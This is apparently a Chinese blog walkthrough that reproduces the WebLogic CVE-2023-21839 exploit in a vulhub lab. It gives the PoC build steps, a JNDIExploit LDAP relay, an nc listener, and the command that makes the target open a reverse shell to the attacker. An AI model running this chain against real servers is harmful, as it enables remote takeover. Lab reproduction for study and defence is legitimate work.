目录
漏洞概述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
影响范围:
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
漏洞复现
环境搭建
靶机环境搭建
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
放到kali中,进入此目录,docker-compose up -d启动运行。
访问管理地址:
http://xx.xx.xx.xx:7001/console
(查看账密的方法:)
docker-compose logs | grep password
攻击环境搭建
Poc地址
https://github.com/4ra1n/CVE-2023-21839
cd cmd
go build -o CVE-2023-21839
若没安装go,则需要apt-get安装一下(kali可能需要先更新源)
go build -o CVE-2023-21839
编译完是这样
攻击命令:
(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)
./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892
中转工具
JNDIExploit v1.4地址:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2
(-i为攻击机IP)
过程复现
1、开启中转工具监听
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2
2、开启nc监听
nc -lvnp 7892
3、发动攻击
./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892
在发动攻击时,./CVE-2023-21839这里会很快结束连接,然后在nc上会显示已成功获取shell
参考:
https://blog.csdn.net/csdnmmd/article/details/129247272
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !